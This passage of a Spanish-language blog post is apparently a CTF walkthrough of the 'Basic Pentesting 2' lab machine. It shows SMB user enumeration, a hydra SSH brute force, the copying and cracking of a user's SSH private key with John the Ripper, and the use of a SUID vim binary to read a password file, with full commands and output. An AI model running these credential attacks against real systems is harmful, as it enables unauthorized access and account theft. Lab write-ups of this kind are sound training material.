Apache<\/strong><\/li>\n<\/ul>\n\n\n\nAunque Apache Struts no se explota en este escenario, la informaci\u00f3n proporciona contexto t\u00e9cnico valioso y confirma la exposici\u00f3n de Samba, que ser\u00e1 clave en la siguiente fase.<\/p>\n\n\n\n
Enumeraci\u00f3n de Samba durante el pentesting<\/h2>\n\n\n\n
Con el servicio Samba confirmado, se utiliza enum4linux <\/strong>para enumerar usuarios del sistema. Su objetivo principal es automatizar la extracci\u00f3n de informaci\u00f3n de equipos que utilizan el protocolo SMB (Server Message Block), permitiendo obtener una visi\u00f3n detallada de la configuraci\u00f3n del sistema objetivo sin necesidad de autenticaci\u00f3n previa o utilizando credenciales de bajo privilegio.<\/p>\n\n\n\nenum4linux 192.168.40.5<\/code><\/pre>\n\n\n\nEntre la informaci\u00f3n que nos da esta utilidad, aparecen los siguientes nombres de usuario:<\/p>\n\n\n\n
[+] Enumerating users using SID S-1-22-1 and logon username '', password '' \nS-1-22-1-1000 Unix User\\kay (Local User) \nS-1-22-1-1001 Unix User\\jan (Local User)<\/code><\/pre>\n\n\n\nEsto se corresponde con los mensajes anteriores, los cuales estaban firmados por K y J. Seg\u00fan Kay, la contrase\u00f1a de Jan es insegura, por lo que hacer un ataque por fuerza bruta podr\u00eda ser una buena idea.<\/p>\n\n\n\n
Ataque de fuerza bruta sobre SSH en pentesting<\/h2>\n\n\n\n
Desde el punto de vista del pentesting, el hecho de conocer usuarios v\u00e1lidos y sospechar contrase\u00f1as d\u00e9biles justifica probar un ataque de fuerza bruta controlado. Dado que se sabe que la contrase\u00f1a de Jan es d\u00e9bil y que el servicio SSH est\u00e1 activo, se decide ir por este camino utilizando la herramienta hydra<\/strong>:<\/p>\n\n\n\nhydra -l jan -P \/usr\/share\/wordlists\/rockyou.txt 192.168.40.5 ssh \nHydra v9.5 (c) 2023 by van Hauser\/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\n\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2025-08-11 12:18:49\n[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4\n[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1\/p:14344398), ~896525 tries per task\n[DATA] attacking ssh:\/\/192.168.40.5:22\/\n[STATUS] 324.00 tries\/min, 324 tries in 00:01h, 14344076 to do in 737:52h, 14 active\n[22][ssh] host: 192.168.40.5 login: jan password: armando<\/strong>\n1 of 1 target successfully completed, 1 valid password found\n[WARNING] Writing restore file because 6 final worker threads did not complete until end.\n[ERROR] 6 targets did not resolve or could not be connected\n[ERROR] 0 target did not complete\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) finished at 2025-08-11 12:21:30<\/code><\/pre>\n\n\n\nLa contrase\u00f1a de jan es \u201carmando<\/strong>\u201d. Con estas credenciales ya es posible acceder al sistema mediante SSH como usuario jan.<\/p>\n\n\n\nPersistencia y acceso lateral mediante claves SSH<\/h2>\n\n\n\n
Kay ya le ha dado el aviso a Jan de que debe cambiar su contrase\u00f1a. Hay que conseguir alguna forma de persistencia a la m\u00e1quina, para que en caso de que la contrase\u00f1a cambie hacia otra m\u00e1s robusta, sigamos teniendo acceso.<\/p>\n\n\n\n
Para ello accedemos a la m\u00e1quina mediante SSH con las credenciales de jan. Una vez dentro del sistema, se revisan los directorios de otros usuarios.<\/p>\n\n\n\n
jan@basic2:~$ ls -la ..\/kay\/.ssh\/\ntotal 20\ndrwxr-xr-x 2 kay kay 4096 Apr 23 2018 .\ndrwxr-xr-x 5 kay kay 4096 Apr 23 2018 ..\n-rw-rw-r-- 1 kay kay 771 Apr 23 2018 authorized_keys\n-rw-r--r-- 1 kay kay 3326 Apr 19 2018 id_rsa\n-rw-r--r-- 1 kay kay 771 Apr 19 2018 id_rsa.pub<\/code><\/pre>\n\n\n\nEn el directorio .ssh del usuario kay se descubre una clave privada SSH sin protecci\u00f3n por permisos, aunque s\u00ed que est\u00e1 protegida mediante una contrase\u00f1a, por lo que si intenamos loguearnos con su usuario y clave privada, no podemos. <\/p>\n\n\n\n
jan@basic2:~$ ssh -i ..\/kay\/.ssh\/id_rsa kay@localhost\nCould not create directory '\/home\/jan\/.ssh'.\nThe authenticity of host 'localhost (::1)' can't be established.\nECDSA key fingerprint is SHA256:+Fk53V\/LB+2pn4OPL7GN\/DuVHVvO0lT9N4W5ifchySQ.\nAre you sure you want to continue connecting (yes\/no)? yes\nFailed to add the host to the list of known hosts (\/home\/jan\/.ssh\/known_hosts).\nEnter passphrase for key '..\/kay\/.ssh\/id_rsa':<\/code><\/pre>\n\n\n\nEste impedimento nos abre la posibilidad de romper la clave privada fuera del sistema.<\/p>\n\n\n\n
Crackeo de la clave privada de Kay<\/h3>\n\n\n\n
Aunque la clave est\u00e1 protegida por passphrase, el simple hecho de que sea legible por otro usuario ya supone un fallo de seguridad relevante. Esto abre la posibilidad de atacar la clave fuera del sistema objetivo.<\/p>\n\n\n\n
Copia de la clave privada a la m\u00e1quina atacante<\/h4>\n\n\n\n
Desde la m\u00e1quina atacante se copia la clave privada utilizando scp<\/strong>, autentic\u00e1ndose como jan:<\/p>\n\n\n\nscp jan@192.168.40.5:\/home\/kay\/.ssh\/id_rsa ~\/Documents\/escenario2\/kay<\/code><\/pre>\n\n\n\nEsta acci\u00f3n confirma que los permisos del fichero permiten su exfiltraci\u00f3n sin necesidad de privilegios elevados.<\/p>\n\n\n\n
Ataque a la passphrase con John the Ripper<\/h4>\n\n\n\n
Una vez copiada la clave privada a la m\u00e1quina atacante, se convierte a un formato compatible con John the Ripper utilizando ssh2john<\/strong>:<\/p>\n\n\n\npython3 \/usr\/share\/john\/ssh2john.py kay > ~\/Documents\/escenario2\/kay.hash<\/code><\/pre>\n\n\n\nEsta herramienta s\u00f3lo analiza la clave privada y extrae la parte que contiene el algoritmo de cifrado y el \u00abhash<\/em>\u00bb de la contrase\u00f1a. Luego, convierte esa informaci\u00f3n en una l\u00ednea de texto con un formato que John the Ripper (o incluso Hashcat) pueda entender.<\/p>\n\n\n\nA continuaci\u00f3n, se lanza un ataque por diccionario con John the Ripper empleando rockyou.txt.<\/p>\n\n\n\n
john --wordlist=\/usr\/share\/wordlists\/rockyou.txt ~\/Documents\/escenario2\/kay.hash\n\nUsing default input encoding: UTF-8\nLoaded 1 password hash (SSH, SSH private key [RSA\/DSA\/EC\/OPENSSH 32\/64])\nCost 1 (KDF\/cipher [0=MD5\/AES 1=MD5\/3DES 2=Bcrypt\/AES]) is 0 for all loaded hashes\nCost 2 (iteration count) is 1 for all loaded hashes\nWill run 8 OpenMP threads\nPress 'q' or Ctrl-C to abort, almost any other key for status\nbeeswax<\/strong> (\/home\/osboxes\/Documents\/escenario2\/kay) \n1g 0:00:00:00 DONE (2025-08-12 01:40) 25.00g\/s 2068Kp\/s 2068Kc\/s 2068KC\/s binkey..bambino1\nUse the \"--show\" option to display all of the cracked passwords reliably\nSession completed.\n<\/code><\/pre>\n\n\n\nEl ataque tiene \u00e9xito, revelando la passphrase de la clave privada: beeswax<\/strong><\/p>\n\n\n\nAcceso como kay por SSH<\/h4>\n\n\n\n
Con esta informaci\u00f3n ya es posible autenticarse como kay mediante clave SSH, sin necesidad de conocer su contrase\u00f1a de usuario. Hay que tener en cuenta que el cliente SSH realiza una comprobaci\u00f3n estricta de permisos sobre el fichero que contiene la clave privada. Si los permisos no son lo suficientemente restrictivos, la autenticaci\u00f3n fallar\u00e1 autom\u00e1ticamente, incluso aunque la clave y la passphrase sean correctas. Para cambiar estos permisos, se usa el siguiente comando:<\/p>\n\n\n\n
chmod 600 ~\/Documents\/escenario2\/kay<\/code><\/pre>\n\n\n\nAhora s\u00f3lo tenemos que ejecutar el siguiente comando e introducir la contrase\u00f1a cuando nos la solicite:<\/p>\n\n\n\n
ssh -i ~\/Documents\/escenario2\/kay kay@192.168.40.5<\/code><\/pre>\n\n\n\nDe este modo, conseguimos entrar en la cuenta de Kay, que tiene privilegios de sudoer. La prueba a continuaci\u00f3n:<\/p>\n\n\n\n
kay@basic2:~$ pwd\n\/home\/kay\nkay@basic2:~$ ls -lias\ntotal 48\n786930 4 drwxr-xr-x 5 kay kay 4096 Apr 23 2018 .\n655362 4 drwxr-xr-x 4 root root 4096 Apr 19 2018 ..\n793456 4 -rw------- 1 kay kay 765 Aug 11 10:14 .bash_history\n793583 4 -rw-r--r-- 1 kay kay 220 Apr 17 2018 .bash_logout\n792902 4 -rw-r--r-- 1 kay kay 3771 Apr 17 2018 .bashrc\n793590 4 drwx------ 2 kay kay 4096 Apr 17 2018 .cache\n786444 4 -rw------- 1 root kay 119 Apr 23 2018 .lesshst\n798919 4 drwxrwxr-x 2 kay kay 4096 Apr 23 2018 .nano\n798920 4 -rw------- 1 kay kay 57 Apr 23 2018 pass.bak\n792307 4 -rw-r--r-- 1 kay kay 655 Apr 17 2018 .profile\n798691 4 drwxr-xr-x 2 kay kay 4096 Apr 23 2018 .ssh\n793592 0 -rw-r--r-- 1 kay kay 0 Apr 17 2018 .sudo_as_admin_successful\n798922 4 -rw------- 1 root kay 538 Apr 23 2018 .viminfo\n<\/code><\/pre>\n\n\n\nObtenci\u00f3n de la contrase\u00f1a de kay (post-explotaci\u00f3n)<\/h4>\n\n\n\n
Antes se ha mencionado un fichero llamado pass.bak en el directorio de usuario de kay. Ahora que estamos logueados, podemos verlo (aunque antes tambi\u00e9n hab\u00eda un truco). Vamos a ver el contenido del fichero:<\/p>\n\n\n\n
kay@basic2:~$ cat pass.bak \nheresareallystrongpasswordthatfollowsthepasswordpolicy$$<\/code><\/pre>\n\n\n\n\u00a1Hemos descubierto la contrase\u00f1a \u00absupersegura<\/em>\u00bb de kay!<\/p>\n\n\n\nEscalada alternativa mediante abuso de binarios SUID (post-explotaci\u00f3n)<\/h2>\n\n\n\n
Continuamos con la post-explotaci\u00f3n, pero esta vez desde el usuario jan. Este usuario ya lo hemos usado para obtener ficheros y romper la contrase\u00f1a de la clave privada de kay, lo que demuestra el peligro de no proteger bien las claves privadas con sus permisos de lectura y lo que una contrase\u00f1a d\u00e9bil puede hacer. Ahora lo que se pretende demostrar es que la contrase\u00f1a de usuario de kay era visible tambi\u00e9n desde el usuario jan.<\/p>\n\n\n\n
Sabemos que pass.bak s\u00f3lo se puede abrir con permiso de sudo, tal y como tiene kay, pero… \u00bfQui\u00e9n m\u00e1s es sudoer? \u00a1Vamos a descubrirlo!<\/p>\n\n\n\n
find \/ -perm -4000 -type f 2>\/dev\/null\n\/usr\/lib\/x86_64-linux-gnu\/lxc\/lxc-user-nic\n\/usr\/lib\/policykit-1\/polkit-agent-helper-1\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/usr\/lib\/snapd\/snap-confine\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/bin\/vim.basic<\/strong>\n\/usr\/bin\/pkexec\n\/usr\/bin\/newgrp\n\/usr\/bin\/chfn\n\/usr\/bin\/sudo\n\/usr\/bin\/chsh\n\/usr\/bin\/newgidmap\n\/usr\/bin\/at\n\/usr\/bin\/gpasswd\n\/usr\/bin\/newuidmap\n\/usr\/bin\/passwd\n\/bin\/su\n\/bin\/ntfs-3g\n\/bin\/ping6\n\/bin\/umount\n\/bin\/fusermount\n\/bin\/mount\n\/bin\/ping<\/code><\/pre>\n\n\n\nResulta que el editor de texto Vim <\/strong>es sudoer. Que este programa tenga el bit SUID activo constituye un fallo de seguridad grave, ya que permite ejecutar el editor con privilegios elevados independientemente del usuario que lo invoque.<\/p>\n\n\n\nAbuso de vim para lectura de credenciales<\/h3>\n\n\n\n
Desde la cuenta de jan, el fichero que contiene la contrase\u00f1a del usuario kay no es accesible utilizando herramientas est\u00e1ndar. Si lo tratamos de ver con cat o con nano obtendremos un mensaje de \u00abpermiso denegado\u00bb. Sin embargo, al abrir el fichero mediante vim, el comportamiento es distinto:<\/p>\n\n\n\n
vim ..\/kay\/pass.bak<\/code><\/pre>\n\n\n\nEsto se debe a que vim.basic se ejecuta con privilegios heredados de su propietario, lo que permite el acceso a archivos que, en condiciones normales, deber\u00edan estar protegidos por el sistema de permisos. Como hemos visto antes, el fichero pass.bak contiene la contrase\u00f1a de kay almacenada en texto plano, por lo que con vim es totalmente visible.<\/p>\n\n\n\n
Con esta informaci\u00f3n, es posible autenticarse directamente como kay utilizando su contrase\u00f1a de usuario, sin necesidad de fuerza bruta.<\/p>\n\n\n\n
\u00bfPor qu\u00e9 este m\u00e9todo no es persistente?<\/h3>\n\n\n\n
Aunque esta t\u00e9cnica permite una escalada inmediata y efectiva, no se considera un mecanismo de persistencia. En el momento en que alguien detecte que vim tiene privilegios, estos podr\u00edan desaparecer, y si kay decide cambiar de contrase\u00f1a, ya no tendremos acceso a la m\u00e1quina. Es por eso que se decidi\u00f3 anteriormente romper la contrase\u00f1a de la clave privada.<\/p>\n\n\n\n
Ante una reacci\u00f3n defensiva m\u00ednima, como el cambio de contrase\u00f1a de kay o la correcci\u00f3n de permisos en vim, este vector deja de ser v\u00e1lido. Sin embargo, comprometer la clave privada SSH de kay, proporciona persistencia real y mantiene el acceso incluso tras un cambio de contrase\u00f1a, siempre que la clave no sea revocada.<\/p>\n\n\n\n
Capturando la bandera<\/h2>\n\n\n\n
Una vez obtenido acceso como el usuario kay, que pertenece al grupo de sudoers, el siguiente paso consiste en comprobar si es posible acceder al directorio \/root, reservado exclusivamente para el usuario administrador.<\/p>\n\n\n\n
Al intentar listar su contenido directamente, el acceso es denegado, como cabr\u00eda esperar en un sistema correctamente configurado:<\/p>\n\n\n\n
kay@basic2:~$ ls \/root\nls: cannot open directory '\/root': Permission denied<\/code><\/pre>\n\n\n\nSin embargo, al ejecutar el mismo comando con privilegios elevados mediante sudo es posible acceder:<\/p>\n\n\n\n
kay@basic2:~$ sudo ls \/root\nflag.txt<\/code><\/pre>\n\n\n\nEl contenido de la bandera<\/h3>\n\n\n\n
\u00a1Hemos encontrado la bandera! Como hemos conseguido elevar privilegios, el \u00faltimo paso en este ejercicio de pentesting es leerla:<\/p>\n\n\n\n
kay@basic2:~$ sudo cat \/root\/flag.txt<\/code><\/p>\n\n\n\n\nCongratulations! You’ve completed this challenge. There are two ways (that I’m aware of) to gain a shell, and two ways to privesc. I encourage you to find them all!<\/p>\n\n\n\n
If you’re in the target audience (newcomers to pentesting), I hope you learned something. A few takeaways from this challenge should be that every little bit of information you can find can be valuable, but sometimes you’ll need to find several different pieces of information and combine them to make them useful. Enumeration is key! Also, sometimes it’s not as easy as just finding an obviously outdated, vulnerable service right away with a port scan (unlike the first entry in this series). Usually you’ll have to dig deeper to find things that aren’t as obvious, and therefore might’ve been overlooked by administrators.<\/p>\n\n\n\n
Thanks for taking the time to solve this VM. If you choose to create a writeup, I hope you’ll send me a link! I can be reached at josiah@vt.edu. If you’ve got questions or feedback, please reach out to me. <\/p>\n\n\n\n
Happy hacking!<\/p>\n<\/blockquote>\n\n\n\n
Conclusiones del pentesting<\/h2>\n\n\n\n
Basic Pentesting 2 es una m\u00e1quina sencilla en apariencia, pero muy efectiva desde el punto de vista formativo. A trav\u00e9s de una cadena de fallos relativamente comunes, (contrase\u00f1as d\u00e9biles, exposici\u00f3n de servicios innecesarios, permisos incorrectos y binarios SUID mal configurados), es posible comprometer por completo el sistema.<\/p>\n\n\n\n
M\u00e1s all\u00e1 de la obtenci\u00f3n de acceso root, esta m\u00e1quina permite profundizar en conceptos de pentesting que suelen pasarse por alto en an\u00e1lisis m\u00e1s superficiales. El uso de t\u00e9cnicas como el crackeo de claves privadas SSH, frente a la simple lectura de contrase\u00f1as en texto claro, refuerza la diferencia entre un acceso puntual y un acceso persistente, y ayuda a asentar criterios m\u00e1s s\u00f3lidos a la hora de evaluar el impacto real de una vulnerabilidad.<\/p>\n\n\n\n
En \u00faltima instancia, el ejercicio subraya una idea fundamental: la seguridad rara vez falla por un \u00fanico error cr\u00edtico, sino por la acumulaci\u00f3n de peque\u00f1os descuidos que, cuando se encadenan, permiten ir mucho m\u00e1s all\u00e1 de lo inicialmente previsto.<\/p>\n\n\n\n
Galer\u00eda<\/h2>\n\n\n\n\n\t\t
![\"Resultado](\"https:\/\/jagumiel.xyz\/blog\/wp-content\/uploads\/2026\/01\/0-nmap-1024x612.png\"\n)
\n<\/a>![\"Listado](\"https:\/\/jagumiel.xyz\/blog\/wp-content\/uploads\/2026\/01\/1-Index-development.png\"\n)
\n<\/a>